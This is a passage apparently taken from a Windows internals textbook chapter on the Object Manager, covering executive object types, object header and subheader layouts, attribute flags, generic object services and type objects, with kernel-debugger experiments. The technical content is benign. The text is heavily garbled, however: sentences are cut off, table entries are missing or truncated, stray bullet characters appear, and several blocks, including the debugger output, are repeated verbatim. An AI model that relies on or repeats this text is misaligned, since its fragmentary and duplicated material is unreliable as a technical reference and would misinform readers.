deleting, protecting, and tracking objects. The Object Manager centralizes resource control operations
that otherwise would be scattered throughout the operating system. It was designed to meet the goals
listed after the experiment.
EXPERIMENT: Exploring the Object Manager
Manager database. These experiments use the following tools, which you should become famil-
I
information about objects (such as the reference count, the number of open handles, secu-
rity descriptors, and so forth). WinObjEx64, available on GitHub, is a similar tool with more
advanced functionality and is open source but not endorsed or signed by Microsoft.
I
Process Explorer and Handle from Sysinternals, as well as Resource Monitor (introduced in
Chapter 1 of Part 1) display the open handles for a process. Process Hacker is another tool
that shows open handles and can show additional details for certain kinds of objects.
I
The kernel debugger !handle extension displays the open handles for a process, as does the
Io.Handles data model object underneath a Process such as @$curprocess.
WinObj and WinObjEx64 provide a way to traverse the namespace that the Object Manager
EXPERIMENT: Exploring the Object Manager
Manager database. These experiments use the following tools, which you should become famil-
I
information about objects (such as the reference count, the number of open handles, secu-
rity descriptors, and so forth). WinObjEx64, available on GitHub, is a similar tool with more
advanced functionality and is open source but not endorsed or signed by Microsoft.
I
Process Explorer and Handle from Sysinternals, as well as Resource Monitor (introduced in
Chapter 1 of Part 1) display the open handles for a process. Process Hacker is another tool
that shows open handles and can show additional details for certain kinds of objects.
I
The kernel debugger !handle extension displays the open handles for a process, as does the
Io.Handles data model object underneath a Process such as @$curprocess.
WinObj and WinObjEx64 provide a way to traverse the namespace that the Object Manager
126
CHAPTER 8 System mechanisms
The Windows Openfiles/query
maintain objects list be enabled. (See the
Openfiles/LocalOpenfiles/
Local ON command, but you still need to reboot the system for the setting to take effect. Process
Explorer, Handle, and Resource Monitor do not require object tracking to be turned on because
they query all system handles and create a per-process object list. Process Hacker queries per-pro-
The Object Manager was designed to meet the following goals:
I
Provide a common, uniform mechanism for using system resources.
I
Isolate object protection to one location in the operating system to ensure uniform and consis-
tent object access policy.
I
Provide a mechanism to charge processes for their use of objects so that limits can be placed on
the usage of system resources.
I
Establish an object-naming scheme that can readily incorporate existing objects, such as the
I
Support the requirements of various operating system environments, such as the ability of a
process to inherit resources from a parent process (needed by Windows and Subsystem for
for UNIX Applications). Although Subsystem for UNIX Applications no longer exists, these facili-
ties were also useful for the later development of the Windows Subsystem for Linux.
I
Establish uniform rules for object retention (that is, for keeping an object available until all pro-
I
objects in the namespace.
I
Allow redirection of object names and paths through symbolic links and allow object owners,
junction points). Combined, these redirection mechanisms compose what is called reparsing.
Internally, Windows has three primary types of objects: executive objects, kernel objects, and GDI/
User objects. Executive objects are objects implemented by various components of the executive
primitive set of objects implemented by the Windows kernel. These objects are not visible to user-
capabilities, such as synchronization, on which executive objects are built. Thus, many executive objects
The Windows Openfiles/query
Openfiles/query
Openfiles/query
maintain objects list be enabled. (See the
maintain objects list be enabled. (See the
maintain objects list
Openfiles/LocalOpenfiles/
Local ON command, but you still need to reboot the system for the setting to take effect. Process
Explorer, Handle, and Resource Monitor do not require object tracking to be turned on because
they query all system handles and create a per-process object list. Process Hacker queries per-pro-
CHAPTER 8 System mechanisms
127
Note The vast majority of GDI/User objects, on the other hand, belong to the Windows
outside the scope of this book, but you can get more information on them from the
are wrapped in executive objects, as well as the majority of DirectX objects (Shaders,
Surfaces, Compositions), which are also wrapped as executive objects.
Owned by the
object manager
Owned by the
kernel
Owned by the
executive
Kernel object
Name
HandleCount
ReferenceCount
Type
Executive object
FIGURE 8-30 Executive objects that contain kernel objects.
Details about the structure of kernel objects and how they are used to implement synchronization
are given later in this chapter. The remainder of this section focuses on how the Object Manager works
objects are involved in implementing Windows security access checking; Chapter 7 of Part 1 thoroughly
covers that topic.
Executive objects
Each Windows environment subsystem projects to its applications a different image of the operating
system. The executive objects and object services are primitives that the environment subsystems use
to construct their own versions of objects and other resources.
Executive objects are typically created either by an environment subsystem on behalf of a user
CreateFileW function, implemented
CreateFileW in
turn calls the native Windows service NtCreateFile
128
CHAPTER 8 System mechanisms
The set of objects an environment subsystem supplies to its applications might be larger or smaller
than the set the executive provides. The Windows subsystem uses executive objects to export its own
mutexes and semaphores are directly based on executive objects (which, in turn, are based on cor-
responding kernel objects). In addition, the Windows subsystem supplies named pipes and mailslots,
(WSL), its subsystem driver (Lxcore.sys) uses executive objects and services as the basis for presenting
Linux-style processes, pipes, and other resources to its applications.
components (or in the case of executive objects directly exported to Windows, in the Windows API ref-
erence documentation). You can see the full list of object types by running Winobj with elevated rights
and navigating to the ObjectTypes directory.
Note The executive implements a total of about 69 object types (depending on the
Windows version). Some of these objects are for use only by the executive component that
include Driver, Callback, and Adapter.
TABLE 8-15 Executive objects exposed to the Windows API
Object Type
Represents
Process
The virtual address space and control information necessary for the execution of
a set of thread objects.
Thread
An executable entity within a process.
A collection of processes manageable as a single entity through the job.
Section
Token
An object with a persistent state (signaled or not signaled) that can be used for
key to be used to refer-
ence the underlying synchronization primitive, avoiding memory usage, making
it usable in low-memory conditions by avoiding an allocation.
Semaphore
A counter that provides a resource gate by allowing some maximum number of
threads to access the resources protected by the semaphore.
Mutex
A synchronization mechanism used to serialize access to a resource.
Timer, IRTimer
objects, called Idle Resilient Timers, are used by UWP applications and certain
services to create timers that are not affected by Connected Standby.
IoCompletion, IoCompletionReserve
I/O operations (known as an I/O completion port in the Windows API). The latter
allows preallocation of the port to combat low-memory situations.
CHAPTER 8 System mechanisms
129
A mechanism to refer to data in the registry. Although keys appear in the Object
values are associated with a key object; key values contain data about the key.
Directory
-
ing other objects or object directories.
SymbolicLink
A virtual name redirection link between an object in the namespace and another
manage the number of work items that will be performed on the queue, how
many threads should be responsible for the work, and dynamic creation and ter-
mination of worker threads, respecting certain limits the caller can set. Windows
exposes the worker factory object through thread pools.
TmRm (Resource Manager), TmTx
(Transaction), TmTm (Transaction
Manager), TmEn (Enlistment)
transactions
and/or enlistments as part of a resource manager or transaction manager. Objects
can be created through the CreateTransactionManager, CreateResourceManager,
CreateTransaction, and CreateEnlistment APIs.
RegistryTransaction
Object used by the low-level lightweight registry transaction API that does not
registry keys.
WindowStation
An object that contains a clipboard, a set of global atoms, and a group of
Desktop objects.
Desktop
An object contained within a window station. A desktop has a logical display
surface and contains windows, menus, and hooks.
PowerRequest
An object associated with a thread that executes, among other things, a call
to SetThreadExecutionState to request a given power change, such as blocking
sleeps (due to a movie being played, for example).
EtwConsumer
Represents a connected ETW real-time consumer that has registered with the
StartTrace API (and can call ProcessTrace to receive the events on the object queue).
CoverageSampler
Created by ETW when enabling code coverage tracing on a given ETW session.
EtwRegistration
Represents the registration object associated with a user-mode (or kernel-mode)
ETW provider that registered with the EventRegister API.
ActivationObject
Represents the object that tracks foreground state for window handles that are
managed by the Raw Input Manager in Win32k.sys.
ActivityReference
Tracks processes managed by the Process Lifetime Manager (PLM) and that
should be kept awake during Connected Standby scenarios.
ALPC Port
Used mainly by the Remote Procedure Call (RPC) library to provide Local RPC
(LRPC) capabilities when using the ncalrpc transport. Also available to internal
services as a generic IPC mechanism between processes and/or the kernel.
Composition,
DxgkCompositionObject,
DxgkCurrentDxgProcessObject,
DxgkDisplayManagerObject,
DxgkSharedBundleObject,
DxgkShartedProtectedSessionObject,
DgxkSharedResource,
DxgkSwapChainObject,
DxgkSharedSyncObject
Used by DirectX 12 APIs in user-space as part of advanced shader and GPGPU
capabilities, these executive objects wrap the underlying DirectX handle(s).
130
CHAPTER 8 System mechanisms
CoreMessaging
Represents a CoreMessaging IPC object that wraps an ALPC port with its own
customized namespace and capabilities; used primarily by the modern Input
Manager but also exposed to any MinUser component on WCOS systems.
EnergyTracker
Exposed to the User Mode Power (UMPO) service to allow tracking and aggrega-
tion of energy usage across a variety of hardware and associating it on a per-
application basis.
Manager API, which allows communication between user-mode services and
when using FilterSendMessage.
Partition
Enables the memory manager, cache manager, and executive to treat a region
of physical memory as unique from a management perspective vis-à-vis the rest
of system RAM, giving it its own instance of management threads, capabilities,
paging, caching, etc. Used by Game Mode and Hyper-V, among others, to better
distinguish the system from the underlying workloads.
that track anything from the Instruction Pointer (IP) all the way to low-level pro-
cessor caching information stored in the PMU counters.
RawInputManager
Represents the object that is bound to an HID device such as a mouse, keyboard,
or tablet and allows reading and managing the window manager input that is
being received by it. Used by modern UI management code such as when Core
Messaging is involved.
Session
-
off/logon for third-party driver usage.
Terminal
Only enabled if the terminal thermal manager (TTM) is enabled, this represents
a user terminal on a device, which is managed by the user mode power manager
(UMPO).
TerminalEventQueue
Only enabled on TTM systems, like the preceding object type, this represents
events being delivered to a terminal on a device, which UMPO communicates
UserApcReserve
Similar to IoCompletionReserve in that it allows precreating a data structure
to be reused during low-memory conditions, this object encapsulates an APC
WaitCompletionPacket
Used by the new asynchronous wait capabilities that were introduced in the user-
mode Thread Pool API, this object wraps the completion of a dispatcher wait as
an I/O packet that can be delivered to an I/O completion port.
WmiGuid
Used by the Windows Management Instrumentation (WMI) APIs when opening
WMI Data Blocks by GUID, either from user mode or kernel mode, such as with
IoWMIOpenBlock.
Note Because Windows NT was originally supposed to support the OS/2 operating system,
the mutex had to be compatible with the existing design of OS/2 mutual-exclusion objects,
a design that required that a thread be able to abandon the object, leaving it inaccessible.
Because this behavior was considered unusual for such an object, another kernel object—the
mutant—was created. Eventually, OS/2 support was dropped, and the object became used by
the Windows 32 subsystem under the name mutex (but it is still called mutant internally).
CHAPTER 8 System mechanisms
131
Object structure
footer. The Object Manager controls the object headers and footer, whereas the owning executive
components control the object bodies of the object types they create. Each object header also contains
an index to a special object, called the type object, that contains information common to each instance
of the object. Additionally, up to eight optional subheaders exist: The name information header, the
quota information header, the process information header, the handle information header, the audit
information header, the padding information header, the extended information header, and the cre-
ator information header. If the extended information header is present, this means that the object has
a footer, and the header will contain a pointer to it.
Object
header
Object
body
Object Type Table
Type object
Object
footer
Object name
Object directory
Security descriptor
Quota charges
Open handles list
034DEF0
2A1DDAF
6D3AED4
0A3C44A1
3DF12AB4
Type name
Pool type
Default quota charges
Access types
Generic access rights mapping
Synchronizable? (Y/N)
Methods:
Open, close, delete
parse, security
query name
Object name
Object directory
Security descriptor
Quota charges
Open handle count
Open handles list
Object type
Reference count
Additional
Data
Process
1
Process
2
Process
3
Object-specific data
FIGURE 8-31 Structure of an object.
Object headers and bodies
found in the optional object subheaders.
In addition to the object header, which contains information that applies to any kind of object, the
structures are located at a variable offset from the start of the object header, the value of which
depends on the number of subheaders associated with the main object header (except, as mentioned
132
CHAPTER 8 System mechanisms
InfoMask
corresponding bit is set in the InfoMask and then uses the remaining bits to select the correct offset
into the global ObpInfoMaskToOffset
the object header.
TABLE 8-16
Field
Purpose
Handle count
Maintains a count of the number of currently opened handles to the object.
Pointer count
Maintains a count of the number of references to the object (including one reference for each
handle), and the number of usage references for each handle (up to 32 for 32-bit systems, and
by pointer without
using a handle.
Security descriptor
Determines who can use the object and what they can do with it. Note that unnamed objects, by
Object type index
Contains the index to a type object that contains attributes common to objects of this type. The
table that stores all the type objects is ObTypeIndexTable. Due to a security mitigation, this index is
ObHeaderCookie and the bottom 8
bits of the address of the object header itself.
Info mask
Bitmask describing which of the optional subheader structures described in Table 8-17 are present,
except for the creator information subheader, which, if present, always precedes the object. The
bitmask is converted to a negative offset by using the ObpInfoMaskToOffset table, with each sub-
header being associated with a 1-byte index that places it relative to the other subheaders present.
Lock
Object Create Info
Ephemeral information about the creation of the object that is stored until the object is fully in-
These offsets exist for all possible combinations of subheader presence, but because the subhead-
hand, the handle information subheader (which is allocated third) has three possible locations because
it might or might not have been allocated after the quota subheader, itself having possibly been al-
located after the name information. Table 8-17 describes all the optional object subheaders and their
CHAPTER 8 System mechanisms
133
TABLE 8-17 Optional object subheaders
Name
Purpose
Bit
Offset
Creator
information
Links the object into a list for all the objects of the
same type and records the process that created the
object, along with a back trace.
0 (0x1)
ObpInfoMaskToOffset[0])
Name
information
Contains the object name, responsible for making
an object visible to other processes for sharing,
and a pointer to the object directory, which pro-
vides the hierarchical structure in which the object
names are stored.
1 (0x2)
ObpInfoMaskToOffset[InfoMask & 0x3]
Handle
information
Contains a database of entries (or just a single
entry) for a process that has an open handle to the
object (along with a per-process handle count).
2 (0x4)
ObpInfoMaskToOffset[InfoMask & 0x7]
Quota
information
Lists the resource charges levied against a process
when it opens a handle to the object.
3 (0x8)
ObpInfoMaskToOffset
Process
information
Contains a pointer to the owning process if this is
an exclusive object. More information on exclusive
objects follows later in the chapter.
4 (0x10)
ObpInfoMaskToOffset
Audit
information
Contains a pointer to the original security descrip-
enabled to guarantee consistency.
5 (0x20)
ObpInfoMaskToOffset
Extended
information
Stores the pointer to the object footer for objects
Objects.
6 (0x40)
ObpInfoMaskToOffset
Padding
information
Stores nothing—empty junk space—but is used to
align the object body on a cache boundary, if this
was requested.
7 (0x80)
ObpInfoMaskToOffset
Each of these subheaders is optional and is present only under certain conditions, either during
system boot or at object creation time. Table 8-18 describes each of these conditions.
TABLE 8-18 Conditions required for presence of object subheaders
Name
Condition
Creator information
The object type must have enabled the maintain type list
maintain object type list-
cussed earlier) enables this for all objects, and Type
Name information
The object must have been created with a name.
Handle information
The object type must have enabled the maintain handle count
Quota information
The object must not have been created by the initial (or idle) system process.
Process information
The object must have been created with the exclusive object-
Audit Information
Extended information
Padding Information
The object type must have enabled the cache aligned
134
CHAPTER 8 System mechanisms
As indicated, if the extended information header is present, an object footer is allocated at the tail of
the object body. Unlike object subheaders, the footer is a statically sized structure that is preallocated
for all possible footer types. There are two such footers, described in Table 8-19.
TABLE 8-19 Conditions required for presence of object footer
Name
Condition
Handle Revocation
Information
The object must be created with ObCreateObjectEx, passing in AllowHandleRevocation in the
OB_EXTENDED_CREATION_INFO
Extended User
Information
The object must be created with ObCreateObjectEx, passing in AllowExtendedUserInfo in the
OB_EXTENDED_CREATION_INFO structure. Silo Context objects are created this way.
object is being created, in a structure called the object attributes
name, the root object directory where it should be inserted, the security descriptor for the object, and
the object attribute flags
Note When an object is being created through an API in the Windows subsystem (such
as CreateEvent or CreateFile), the caller does not specify any object attributes—the
created through Win32 go in the BaseNamedObjects directory, either the global or per-
part of the object attributes structure. More information on BaseNamedObjects and how
it relates to the per-session namespace follows later in this chapter.
TABLE 8-20
Attributes Flag
Header Flag Bit
Purpose
OBJ_INHERIT
Saved in the handle table entry
Determines whether the handle to the object will be
inherited by child processes and whether a process
can use DuplicateHandle to make a copy.
OBJ_PERMANENT
PermanentObject
-
ence counts, described later.
OBJ_EXCLUSIVE
ExclusiveObject
process that created it.
OBJ_CASE_INSENSITIVE
Not stored, used at run time
namespace should be case insensitive. It can be over-
ridden by the case insensitive
OBJ_OPENIF
Not stored, used at run time
name should result in an open, if the object exists,
instead of a failure.
OBJ_OPENLINK
Not stored, used at run time
handle to the symbolic link, not the target.
OBJ_KERNEL_HANDLE
kernel handle (more on this later).
CHAPTER 8 System mechanisms
135
Attributes Flag
Header Flag Bit
Purpose
OBJ_FORCE_ACCESS_CHECK
Not stored, used at run time
from kernel mode, full access checks should be
performed.
OBJ_KERNEL_EXCLUSIVE
Disables any user-mode process from opening a
handle to the object; used to protect the \Device\
PhysicalMemory and \Win32kSessionGlobals sec-
tion objects.
OBJ_IGNORE_IMPERSONATED_
DEVICEMAP
Not stored, used at run time
Indicates that when a token is being impersonated,
the DOS Device Map of the source user should not
DOS Device Map should be maintained for object
lookup. This is a security mitigation for certain types
OBJ_DONT_REPARSE
Not stored, used at run time
Disables any kind of reparsing situation (symbolic
-
tion), and returns STATUS_REPARSE_POINT_
ENCOUNTERED if any such situation occurs. This is a
security mitigation for certain types of path redirec-
tion attacks.
N/A
DefaultSecurityQuota
-
N/A
SingleHandleEntry
contains only a single entry and not a database.
N/A
NewObject
yet inserted into the object namespace.
N/A
DeletedInline
not being de-
leted through the deferred deletion worker
thread but rather inline through a call to
ObDereferenceObject(Ex).
In addition to an object header, each object has an object body whose format and contents are
unique to its object type; all objects of the same type share the same object body format. By creating
an object type and supplying services for it, an executive component can control the manipulation of
data in all object bodies of that type. Because the object header has a static and well-known size, the
Object Manager can easily look up the object header for an object simply by subtracting the size of
the header from the pointer of the object. As explained earlier, to access the subheaders, the Object
Because of the standardized object header, footer, and subheader structures, the Object Manager
is able to provide a small set of generic services that can operate on the attributes stored in any object
certain objects). These generic services, some of which the Windows subsystem makes available to
Windows applications, are listed in Table 8-21.
Although all of these services are not generally implemented by most object types, they typically
-
service for its process objects.
136
CHAPTER 8 System mechanisms
However, some objects may not directly expose such services and could be internally created as
WmiGuid object is created, but no handle is exposed to the application for any kind of close or query
services. The key thing to understand, however, is that there is no single generic creation routine.
Such a routine would have been quite complicated because the set of parameters required to initial-
the Object Manager would have incurred additional processing overhead each time a thread called an
object service to determine the type of object the handle referred to and to call the appropriate ver-
sion of the service.
TABLE 8-21 Generic object services
Service
Purpose
Close
Closes a handle to an object, if allowed (more on this later).
Duplicate
Shares an object by duplicating a handle and giving it to another process (if
allowed, as described later).
Inheritance
If a handle is marked as inheritable, and a child process is spawned with handle
inheritance enabled, this behaves like duplication for those handles.
Make permanent/temporary
Changes the retention of an object (described later).
Query object
-
aged at the Object Manager level.
Query security
Set security
Changes the protection on an object.
Wait for a single object
execution or be associated with an I/O completion port through a wait comple-
tion packet.
Signal an object and wait for another
Signals the object, performing wake semantics on the dispatcher object backing
it, and then waits on a single object as per above. The wake/wait operation is
Wait for multiple objects
Associates a wait block with one or more objects, up to a limit (64), which can
port through a wait completion packet.
Type objects
Object headers contain data that is common to all objects but that can take on different values for
descriptor. However, objects also contain some data that remains constant for all objects of a particular
a handle to objects of that type. The executive supplies terminate and suspend access (among others)
when creating a new object type. It uses an object of its own, a type object, to record this data. As
CHAPTER 8 System mechanisms
137
section later in this chapter) is set, a type object also links together all objects of the same type (in this
functionality takes advantage of the creator information subheader discussed previously.
Process
Object 1
Process
Object 2
Process
type
object
Process
Object 3
Process
Object 4
FIGURE 8-32 Process objects and the process type object.
EXPERIMENT: Viewing object headers and type objects
a process object with the dx @$cursession.Processes debugger data model command:
lkd> dx -r0 &@$cursession.Processes[4].KernelObject
&@$cursession.Processes[4].KernelObject
: 0xffff898f0327d300 [Type: _EPROCESS *]
Then execute the !object command with the process object address as the argument:
lkd> !object 0xffff898f0327d300
Object: ffff898f0327d300 Type: (ffff898f032954e0) Process
ObjectHeader: ffff898f0327d2d0 (new version)
HandleCount: 6 PointerCount: 215645
Notice that on 32-bit Windows, the object header starts 0x18 (24 decimal) bytes prior to the
start of the object body, and on 64-bit Windows, it starts 0x30 (48 decimal) bytes prior—the size
of the object header itself. You can view the object header with this command:
lkd> dx (nt!_OBJECT_HEADER*)0xffff898f0327d2d0
(nt!_OBJECT_HEADER*)0xffff898f0327d2d0
: 0xffff898f0327d2d0 [Type: _OBJECT_HEADER *]
[+0x000] PointerCount : 214943 [Type: __int64]
[+0x008] HandleCount
: 6 [Type: __int64]
[+0x008] NextToFree
: 0x6 [Type: void *]
[+0x010] Lock
[Type: _EX_PUSH_LOCK]
[+0x018] TypeIndex
: 0x93 [Type: unsigned char]
[+0x019] TraceFlags
: 0x0 [Type: unsigned char]
[+0x019 ( 0: 0)] DbgRefTrace
: 0x0 [Type: unsigned char]
EXPERIMENT: Viewing object headers and type objects
a process object with the dx @$cursession.Processes debugger data model command:
lkd> dx -r0 &@$cursession.Processes[4].KernelObject
&@$cursession.Processes[4].KernelObject
: 0xffff898f0327d300 [Type: _EPROCESS *]
Then execute the !object command with the process object address as the argument:
lkd> !object 0xffff898f0327d300
Object: ffff898f0327d300 Type: (ffff898f032954e0) Process
ObjectHeader: ffff898f0327d2d0 (new version)
HandleCount: 6 PointerCount: 215645
Notice that on 32-bit Windows, the object header starts 0x18 (24 decimal) bytes prior to the
start of the object body, and on 64-bit Windows, it starts 0x30 (48 decimal) bytes prior—the size
of the object header itself. You can view the object header with this command:
lkd> dx (nt!_OBJECT_HEADER*)0xffff898f0327d2d0
(nt!_OBJECT_HEADER*)0xffff898f0327d2d0
: 0xffff898f0327d2d0 [Type: _OBJECT_HEADER *]
[+0x000] PointerCount : 214943 [Type: __int64]
[+0x008] HandleCount
: 6 [Type: __int64]
[+0x008] NextToFree
: 0x6 [Type: void *]
[+0x010] Lock
[Type: _EX_PUSH_LOCK]
[+0x018] TypeIndex
: 0x93 [Type: unsigned char]
[+0x019] TraceFlags
: 0x0 [Type: unsigned char]
[+0x019 ( 0: 0)] DbgRefTrace
: 0x0 [Type: unsigned char]
138
CHAPTER 8 System mechanisms
[+0x019 ( 1: 1)] DbgTracePermanent : 0x0 [Type: unsigned char]
[+0x01a] InfoMask
: 0x80 [Type: unsigned char]
[+0x01b] Flags
: 0x2 [Type: unsigned char]
[+0x01b ( 0: 0)] NewObject : 0x0 [Type: unsigned char]
[+0x01b ( 1: 1)] KernelObject : 0x1 [Type: unsigned char]
[+0x01b ( 2: 2)] KernelOnlyAccess : 0x0 [Type: unsigned char]
[+0x01b ( 3: 3)] ExclusiveObject : 0x0 [Type: unsigned char]
[+0x01b ( 4: 4)] PermanentObject : 0x0 [Type: unsigned char]
[+0x01b ( 5: 5)] DefaultSecurityQuota : 0x0 [Type: unsigned char]
[+0x01b ( 6: 6)] SingleHandleEntry : 0x0 [Type: unsigned char]
[+0x01b ( 7: 7)] DeletedInline : 0x0 [Type: unsigned char]
[+0x01c] Reserved
: 0xffff898f [Type: unsigned long]
[+0x020] ObjectCreateInfo : 0xfffff8047ee6d500 [Type: _OBJECT_CREATE_INFORMATION *]
[+0x020] QuotaBlockCharged : 0xfffff8047ee6d500 [Type: void *]
[+0x028] SecurityDescriptor : 0xffffc704ade03b6a [Type: void *]
[+0x030] Body
[Type: _QUAD]
ObjectType
: Process
UnderlyingObject [Type: _EPROCESS]
Now look at the object type data structure by copying the pointer that !object showed
you earlier:
lkd> dx (nt!_OBJECT_TYPE*)0xffff898f032954e0
(nt!_OBJECT_TYPE*)0xffff898f032954e0
: 0xffff898f032954e0 [Type: _OBJECT_TYPE *]
[+0x000] TypeList
[Type: _LIST_ENTRY]
[+0x010] Name
: "Process" [Type: _UNICODE_STRING]
[+0x020] DefaultObject : 0x0 [Type: void *]
[+0x028] Index
: 0x7 [Type: unsigned char]
[+0x02c] TotalNumberOfObjects : 0x2e9 [Type: unsigned long]
[+0x030] TotalNumberOfHandles : 0x15a1 [Type: unsigned long]
[+0x034] HighWaterNumberOfObjects : 0x2f9 [Type: unsigned long]
[+0x038] HighWaterNumberOfHandles : 0x170d [Type: unsigned long]
[+0x040] TypeInfo
[Type: _OBJECT_TYPE_INITIALIZER]
[+0x0b8] TypeLock
[Type: _EX_PUSH_LOCK]
[+0x0c0] Key
: 0x636f7250 [Type: unsigned long]
[+0x0c8] CallbackList [Type: _LIST_ENTRY]
The output shows that the object type structure includes the name of the object type, tracks
the total number of active objects of that type, and tracks the peak number of handles and
objects of that type. The CallbackList
that are associated with this object type. The TypeInfo
lkd> dx ((nt!_OBJECT_TYPE*)0xffff898f032954e0)->TypeInfo
((nt!_OBJECT_TYPE*)0xffff898f032954e0)->TypeInfo
[Type: _OBJECT_TYPE_INITIALIZER]
[+0x000] Length : 0x78 [Type: unsigned short]
[+0x002] ObjectTypeFlags : 0xca [Type: unsigned short]
[+0x002 ( 0: 0)] CaseInsensitive : 0x0 [Type: unsigned char]
[+0x002 ( 1: 1)] UnnamedObjectsOnly : 0x1 [Type: unsigned char]
[+0x002 ( 2: 2)] UseDefaultObject : 0x0 [Type: unsigned char]
[+0x002 ( 3: 3)] SecurityRequired : 0x1 [Type: unsigned char]
[+0x002 ( 4: 4)] MaintainHandleCount : 0x0 [Type: unsigned char]
[+0x002 ( 5: 5)] MaintainTypeList : 0x0 [Type: unsigned char]
[+0x019 ( 1: 1)] DbgTracePermanent : 0x0 [Type: unsigned char]
[+0x01a] InfoMask
: 0x80 [Type: unsigned char]
[+0x01b] Flags
: 0x2 [Type: unsigned char]
[+0x01b ( 0: 0)] NewObject : 0x0 [Type: unsigned char]
[+0x01b ( 1: 1)] KernelObject : 0x1 [Type: unsigned char]
[+0x01b ( 2: 2)] KernelOnlyAccess : 0x0 [Type: unsigned char]
[+0x01b ( 3: 3)] ExclusiveObject : 0x0 [Type: unsigned char]
[+0x01b ( 4: 4)] PermanentObject : 0x0 [Type: unsigned char]
[+0x01b ( 5: 5)] DefaultSecurityQuota : 0x0 [Type: unsigned char]
[+0x01b ( 6: 6)] SingleHandleEntry : 0x0 [Type: unsigned char]
[+0x01b ( 7: 7)] DeletedInline : 0x0 [Type: unsigned char]
[+0x01c] Reserved
: 0xffff898f [Type: unsigned long]
[+0x020] ObjectCreateInfo : 0xfffff8047ee6d500 [Type: _OBJECT_CREATE_INFORMATION *]
[+0x020] QuotaBlockCharged : 0xfffff8047ee6d500 [Type: void *]
[+0x028] SecurityDescriptor : 0xffffc704ade03b6a [Type: void *]
[+0x030] Body
[Type: _QUAD]
ObjectType
: Process
UnderlyingObject [Type: _EPROCESS]
Now look at the object type data structure by copying the pointer that !object showed
you earlier:
lkd> dx (nt!_OBJECT_TYPE*)0xffff898f032954e0
(nt!_OBJECT_TYPE*)0xffff898f032954e0
: 0xffff898f032954e0 [Type: _OBJECT_TYPE *]
[+0x000] TypeList
[Type: _LIST_ENTRY]
[+0x010] Name
: "Process" [Type: _UNICODE_STRING]
[+0x020] DefaultObject : 0x0 [Type: void *]
[+0x028] Index
: 0x7 [Type: unsigned char]
[+0x02c] TotalNumberOfObjects : 0x2e9 [Type: unsigned long]
[+0x030] TotalNumberOfHandles : 0x15a1 [Type: unsigned long]
[+0x034] HighWaterNumberOfObjects : 0x2f9 [Type: unsigned long]
[+0x038] HighWaterNumberOfHandles : 0x170d [Type: unsigned long]
[+0x040] TypeInfo
[Type: _OBJECT_TYPE_INITIALIZER]
[+0x0b8] TypeLock
[Type: _EX_PUSH_LOCK]
[+0x0c0] Key
: 0x636f7250 [Type: unsigned long]
[+0x0c8] CallbackList [Type: _LIST_ENTRY]
The output shows that the object type structure includes the name of the object type, tracks
the total number of active objects of that type, and tracks the peak number of handles and
objects of that type. The CallbackList
CallbackList
CallbackList
that are associated with this object type. The TypeInfo
lkd> dx ((nt!_OBJECT_TYPE*)0xffff898f032954e0)->TypeInfo
((nt!_OBJECT_TYPE*)0xffff898f032954e0)->TypeInfo
[Type: _OBJECT_TYPE_INITIALIZER]
[+0x000] Length : 0x78 [Type: unsigned short]
[+0x002] ObjectTypeFlags : 0xca [Type: unsigned short]
[+0x002 ( 0: 0)] CaseInsensitive : 0x0 [Type: unsigned char]
[+0x002 ( 1: 1)] UnnamedObjectsOnly : 0x1 [Type: unsigned char]
[+0x002 ( 2: 2)] UseDefaultObject : 0x0 [Type: unsigned char]
[+0x002 ( 3: 3)] SecurityRequired : 0x1 [Type: unsigned char]
[+0x002 ( 4: 4)] MaintainHandleCount : 0x0 [Type: unsigned char]
[+0x002 ( 5: 5)] MaintainTypeList : 0x0 [Type: unsigned char]
CHAPTER 8 System mechanisms
139
[+0x002 ( 6: 6)] SupportsObjectCallbacks : 0x1 [Type: unsigned char]
[+0x002 ( 7: 7)] CacheAligned : 0x1 [Type: unsigned char]
[+0x003 ( 0: 0)] UseExtendedParameters : 0x0 [Type: unsigned char]
[+0x003 ( 7: 1)] Reserved
: 0x0 [Type: unsigned char]
[+0x004] ObjectTypeCode : 0x20 [Type: unsigned long]
[+0x008] InvalidAttributes : 0xb0 [Type: unsigned long]
[+0x00c] GenericMapping [Type: _GENERIC_MAPPING]
[+0x01c] ValidAccessMask : 0x1fffff [Type: unsigned long]
[+0x020] RetainAccess : 0x101000 [Type: unsigned long]
[+0x024] PoolType
: NonPagedPoolNx (512) [Type: _POOL_TYPE]
[+0x028] DefaultPagedPoolCharge : 0x1000 [Type: unsigned long]
[+0x02c] DefaultNonPagedPoolCharge : 0x8d8 [Type: unsigned long]
[+0x030] DumpProcedure : 0x0 [Type: void (__cdecl*)(void *,_OBJECT_DUMP_CONTROL *)]
[+0x038] OpenProcedure : 0xfffff8047f062f40 [Type: long (__cdecl*)
(_OB_OPEN_REASON,char,_EPROCESS *,void *,unsigned long *,unsigned long)]
[+0x040] CloseProcedure : 0xfffff8047F087a90 [Type: void (__cdecl*)
(_EPROCESS *,void *,unsigned __int64,unsigned __int64)]
[+0x048] DeleteProcedure : 0xfffff8047f02f030 [Type: void (__cdecl*)(void *)]
[+0x050] ParseProcedure : 0x0 [Type: long (__cdecl*)(void *,void *,_ACCESS_STATE *,
char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,
_SECURITY_QUALITY_OF_SERVICE *,void * *)]
[+0x050] ParseProcedureEx : 0x0 [Type: long (__cdecl*)(void *,void *,_ACCESS_STATE *,
char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,
_SECURITY_QUALITY_OF_SERVICE *,_OB_EXTENDED_PARSE_PARAMETERS *,void * *)]
[+0x058] SecurityProcedure : 0xfffff8047eff57b0 [Type: long (__cdecl*)
(void *,_SECURITY_OPERATION_CODE,unsigned long *,void *,unsigned long *,
void * *,_POOL_TYPE,_GENERIC_MAPPING *,char)]
[+0x060] QueryNameProcedure : 0x0 [Type: long (__cdecl*)(void *,unsigned char,_
OBJECT_NAME_INFORMATION *,unsigned long,unsigned long *,char)]
[+0x068] OkayToCloseProcedure : 0x0 [Type: unsigned char (__cdecl*)(_EPROCESS *,
void *,void *,char)]
[+0x070] WaitObjectFlagMask : 0x0 [Type: unsigned long]
[+0x074] WaitObjectFlagOffset : 0x0 [Type: unsigned short]
[+0x076] WaitObjectPointerOffset : 0x0 [Type: unsigned short]
-
through Windows API routines. The information stored in the type initializers is described in Table 8-22.
TABLE 8-22
Attribute
Purpose
Type name
The name for objects of this type (Process, Event, ALPC Port, and so on).
Pool type
Indicates whether objects of this type should be allocated from paged or non-
paged memory.
Default quota charges
Default paged and non-paged pool values to charge to process quotas.
Valid access mask
The types of access a thread can request when opening a handle to an object of this
